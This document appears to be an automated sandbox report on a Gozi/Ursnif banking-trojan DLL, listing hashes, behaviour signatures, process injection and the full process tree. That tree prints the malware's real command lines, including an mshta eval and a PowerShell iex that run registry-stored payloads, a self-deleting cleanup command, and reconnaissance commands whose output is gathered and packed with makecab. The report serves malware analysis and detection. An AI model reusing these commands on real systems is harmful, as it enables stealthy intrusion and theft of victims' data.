gozi_ifsb | 84c7bba059b9d495d9e923346510a67a062b20d17c90d806fbf8cb6b67d91363

Analysis

max time kernel
150s
max time network
113s
platform
windows10_x64
resource
win10
submitted
27-10-2020 15:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

u271020tar.dll
Size

352KB
MD5

d800d8db5cb2ecc22899dcf7e1c2430d
SHA1

24a64c88075907a3f01bfdc68ef3044c13f25296
SHA256

84c7bba059b9d495d9e923346510a67a062b20d17c90d806fbf8cb6b67d91363
SHA512

39bfb1567d32b177b27627fc76fc5410ebd6009ed972f7b044eae034746311d603ba67b7e1e51d374b34b788a5ccccf7849f2b7169c6184ba180d609cc646aa8

Score

10^/10

gozi_ifsb ursnif banker spyware trojan

Malware Config

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
Ursnif, Dreambot
Ursnif is a variant of the Gozi IFSB with more capabilities.
banker trojan ursnif

ServiceHost packer 1 IoCs

Detects ServiceHost packer used for .NET malware

Processes:

resource	yara_rule
behavioral2/memory/2136-32-0x0000000BB15BD000-mapping.dmp	servicehost

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of SetThreadContext 7 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2152 set thread context of 3000	2152	powershell.exe	Explorer.EXE
PID 3000 set thread context of 3516	3000	Explorer.EXE	RuntimeBroker.exe
PID 3000 set thread context of 3792	3000	Explorer.EXE	iexplore.exe
PID 3000 set thread context of 2136	3000	Explorer.EXE	cmd.exe
PID 2136 set thread context of 2636	2136	cmd.exe	PING.EXE
PID 3000 set thread context of 736	3000	Explorer.EXE	WinMail.exe
PID 3000 set thread context of 1352	3000	Explorer.EXE	cmd.exe

Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

1500 net.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1412 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

1572 systeminfo.exe

pid	process
1500	net.exe

pid	process
1412	tasklist.exe

pid	process
1572	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "72744762"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "72744762"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "79463554"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2FF5FF69-186E-11EB-A97A-FAC58BA889B4} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 307cc9f87aacd601	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000017569456ed1d8a4f809c4bd856b164d40000000002000000000010660000000100002000000043c88e4dc9edb53d2ae7ee725807bb7a714b73603202b9fae6cd8f5237ca1d76000000000e8000000002000020000000b87775438f401cf357a5a543c0ce586e01b1fb20333a92de3151107c2fb8aaee200000007c78625f3df73dfb21c5c0959d8198c4c88989fc3bb426eaa9a0865abe4ca8ef40000000bed62e50bbe1a7edc922a3ba06c7e0f0e035aa012cdbebef71c41814a521a4616d4915dcb938307213c9728e47fe624b607d37d60b91a8d1b45c7d150dacd1b5	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30846075"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30846075"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 5063f5f77aacd601	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000017569456ed1d8a4f809c4bd856b164d400000000020000000000106600000001000020000000b9f03646677340b2ae2b6bbbe8d8f24fb330193d280beef165f5e982dfdb1f78000000000e80000000020000200000005f3286694c4e76e86b0686fc56d17be3d0c2e8b0039f1ad52e25b7362bb7802a20000000dd1ed0d8d6fa7d1d1baef0e56bddb1b610070122a35808a5278ff3c1239b437e40000000cc2f655034601818089256dc7e4a4c32f66a2ed1b92d9a9e54707b301c9e8fe39913ebd156c1d3b266392e58dd0d30ca7a51e7f4c07ea8337857fa0d868c0095	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30846075"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2636 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

2636 PING.EXE

pid	process
2636	PING.EXE

pid	process
2636	PING.EXE

Suspicious behavior: EnumeratesProcesses 1260 IoCs

Processes:

rundll32.exepowershell.exeExplorer.EXE

pid	process
3876	rundll32.exe
3876	rundll32.exe
2152	powershell.exe
2152	powershell.exe
2152	powershell.exe
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE

Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2152 powershell.exe
3000 Explorer.EXE
3000 Explorer.EXE
3000 Explorer.EXE
2136 cmd.exe
3000 Explorer.EXE
3000 Explorer.EXE

pid	process
2152	powershell.exe
3000	Explorer.EXE
3000	Explorer.EXE
3000	Explorer.EXE
2136	cmd.exe
3000	Explorer.EXE
3000	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

powershell.exeExplorer.EXEtasklist.exe

description	pid	process
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeDebugPrivilege	1412	tasklist.exe
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE
Token: SeShutdownPrivilege	3000	Explorer.EXE
Token: SeCreatePagefilePrivilege	3000	Explorer.EXE

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

iexplore.exe

pid process

3792 iexplore.exe
3792 iexplore.exe
3792 iexplore.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEExplorer.EXE

pid	process
3792	iexplore.exe
3792	iexplore.exe
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
3792	iexplore.exe
3792	iexplore.exe
1852	IEXPLORE.EXE
1852	IEXPLORE.EXE
3792	iexplore.exe
3792	iexplore.exe
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
3000	Explorer.EXE

Suspicious use of WriteProcessMemory 104 IoCs

Processes:

rundll32.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4008 wrote to memory of 3876	4008	rundll32.exe	rundll32.exe
PID 4008 wrote to memory of 3876	4008	rundll32.exe	rundll32.exe
PID 4008 wrote to memory of 3876	4008	rundll32.exe	rundll32.exe
PID 3792 wrote to memory of 3716	3792	iexplore.exe	IEXPLORE.EXE
PID 3792 wrote to memory of 3716	3792	iexplore.exe	IEXPLORE.EXE
PID 3792 wrote to memory of 3716	3792	iexplore.exe	IEXPLORE.EXE
PID 3792 wrote to memory of 1852	3792	iexplore.exe	IEXPLORE.EXE
PID 3792 wrote to memory of 1852	3792	iexplore.exe	IEXPLORE.EXE
PID 3792 wrote to memory of 1852	3792	iexplore.exe	IEXPLORE.EXE
PID 2116 wrote to memory of 2152	2116	mshta.exe	powershell.exe
PID 2116 wrote to memory of 2152	2116	mshta.exe	powershell.exe
PID 2152 wrote to memory of 888	2152	powershell.exe	csc.exe
PID 2152 wrote to memory of 888	2152	powershell.exe	csc.exe
PID 888 wrote to memory of 1572	888	csc.exe	cvtres.exe
PID 888 wrote to memory of 1572	888	csc.exe	cvtres.exe
PID 2152 wrote to memory of 1948	2152	powershell.exe	csc.exe
PID 2152 wrote to memory of 1948	2152	powershell.exe	csc.exe
PID 1948 wrote to memory of 2144	1948	csc.exe	cvtres.exe
PID 1948 wrote to memory of 2144	1948	csc.exe	cvtres.exe
PID 2152 wrote to memory of 3000	2152	powershell.exe	Explorer.EXE
PID 2152 wrote to memory of 3000	2152	powershell.exe	Explorer.EXE
PID 2152 wrote to memory of 3000	2152	powershell.exe	Explorer.EXE
PID 2152 wrote to memory of 3000	2152	powershell.exe	Explorer.EXE
PID 3000 wrote to memory of 3516	3000	Explorer.EXE	RuntimeBroker.exe
PID 3000 wrote to memory of 3516	3000	Explorer.EXE	RuntimeBroker.exe
PID 3000 wrote to memory of 2136	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 2136	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 2136	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 3516	3000	Explorer.EXE	RuntimeBroker.exe
PID 3000 wrote to memory of 3516	3000	Explorer.EXE	RuntimeBroker.exe
PID 3000 wrote to memory of 3792	3000	Explorer.EXE	iexplore.exe
PID 3000 wrote to memory of 3792	3000	Explorer.EXE	iexplore.exe
PID 3000 wrote to memory of 3792	3000	Explorer.EXE	iexplore.exe
PID 3000 wrote to memory of 3792	3000	Explorer.EXE	iexplore.exe
PID 3000 wrote to memory of 2136	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 2136	3000	Explorer.EXE	cmd.exe
PID 2136 wrote to memory of 2636	2136	cmd.exe	PING.EXE
PID 2136 wrote to memory of 2636	2136	cmd.exe	PING.EXE
PID 2136 wrote to memory of 2636	2136	cmd.exe	PING.EXE
PID 2136 wrote to memory of 2636	2136	cmd.exe	PING.EXE
PID 2136 wrote to memory of 2636	2136	cmd.exe	PING.EXE
PID 3000 wrote to memory of 480	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 480	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 1740	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 1740	3000	Explorer.EXE	cmd.exe
PID 1740 wrote to memory of 2280	1740	cmd.exe	nslookup.exe
PID 1740 wrote to memory of 2280	1740	cmd.exe	nslookup.exe
PID 480 wrote to memory of 3916	480	cmd.exe	nslookup.exe
PID 480 wrote to memory of 3916	480	cmd.exe	nslookup.exe
PID 3000 wrote to memory of 2024	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 2024	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 1412	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 1412	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 1316	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 1316	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 736	3000	Explorer.EXE	WinMail.exe
PID 3000 wrote to memory of 736	3000	Explorer.EXE	WinMail.exe
PID 3000 wrote to memory of 736	3000	Explorer.EXE	WinMail.exe
PID 3000 wrote to memory of 736	3000	Explorer.EXE	WinMail.exe
PID 3000 wrote to memory of 736	3000	Explorer.EXE	WinMail.exe
PID 1316 wrote to memory of 1572	1316	cmd.exe	systeminfo.exe
PID 1316 wrote to memory of 1572	1316	cmd.exe	systeminfo.exe
PID 3000 wrote to memory of 1352	3000	Explorer.EXE	cmd.exe
PID 3000 wrote to memory of 1352	3000	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3000

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\u271020tar.dll,#1
2⤵
- Suspicious use of WriteProcessMemory
PID:4008

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\u271020tar.dll,#1
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3876

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\0F48D51C-2296-191F-A4B3-765D18970AE1\\\Audients'));if(!window.flag)close()</script>"
2⤵
- Suspicious use of WriteProcessMemory
PID:2116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\0F48D51C-2296-191F-A4B3-765D18970AE1").AdmTdeui))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2152

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qtnrgd4y\qtnrgd4y.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES39FC.tmp" "c:\Users\Admin\AppData\Local\Temp\qtnrgd4y\CSC73648D81FE4048F79E82FBFAE66238.TMP"
5⤵
PID:1572

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uoxlzjkv\uoxlzjkv.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3AC8.tmp" "c:\Users\Admin\AppData\Local\Temp\uoxlzjkv\CSCB4C8A1FD9F904BA6B3527E5BA83C2E8E.TMP"
5⤵
PID:2144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\u271020tar.dll"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2636

C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\A4AE.bi1"
2⤵
- Suspicious use of WriteProcessMemory
PID:480

C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
3⤵
PID:3916

C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\13B4.bi1"
2⤵
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
3⤵
PID:2280

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\13B4.bi1"
2⤵
PID:2024

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A4AE.bi1"
2⤵
PID:1412

C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\system32\systeminfo.exe
systeminfo.exe
3⤵
- Gathers system information
PID:1572

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
2⤵
PID:736

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:1352

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
2⤵
PID:396

C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
2⤵
PID:2632

C:\Windows\system32\net.exe
net view
3⤵
- Discovers systems in the same network
PID:1500

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
2⤵
PID:3888

C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
2⤵
PID:2568

C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
3⤵
PID:636

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
2⤵
PID:3396

C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
2⤵
PID:3780

C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1412

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
2⤵
PID:2564

C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
2⤵
PID:2056

C:\Windows\system32\driverquery.exe
driverquery.exe
3⤵
PID:3916

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
2⤵
PID:2632

C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
2⤵
PID:1028

C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
3⤵
PID:2568

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
2⤵
PID:2000

C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\A3D5.bin1 > C:\Users\Admin\AppData\Local\Temp\A3D5.bin & del C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
2⤵
PID:2624

C:\Windows\system32\makecab.exe
makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\92AE.bin"
2⤵
PID:1412

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3516

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3792

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3792 CREDAT:82945 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3716

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3792 CREDAT:82951 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1852

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Remote System Discovery

T1018

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\DVIIK95S.cookie
MD5
14a998cdb041d1b5ffc8d1d1a0877df2

SHA1
0ed78baad44d0a62234a53c5ff7489a60507d615

SHA256
52e40832b9ef9ba5f370da59905461808996c4159db321353690d1fa0b6b93d2

SHA512
ed62a38e5ead08f698ad144ac1780dde86ac9d2f915f488509e9a2d7aabc4ce0b4a9040e06e5f99726280d95d244396d1342f8a435a97a510dcb4b74f035f956

Download Submit
C:\Users\Admin\AppData\Local\Temp\13B4.bi1
MD5
c4f77466fa6bb3b7b587745fd51eb73e

SHA1
c9ee49b895e2cec4483b9e3d84e32f0d650edcbb

SHA256
37d5f9a9a4db772e5bcc6a0211a3092049c09f438067bc36cde152e10b79eeb8

SHA512
51c1ddeac48567d106cbcc5bad19b31639b73ec66d11ed83dbc90da880792df0b6bd6c6e28a712e854ceeb6bd96a3985e521cb9d666b0ccd087e96f4a90fc7d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\13B4.bi1
MD5
c4f77466fa6bb3b7b587745fd51eb73e

SHA1
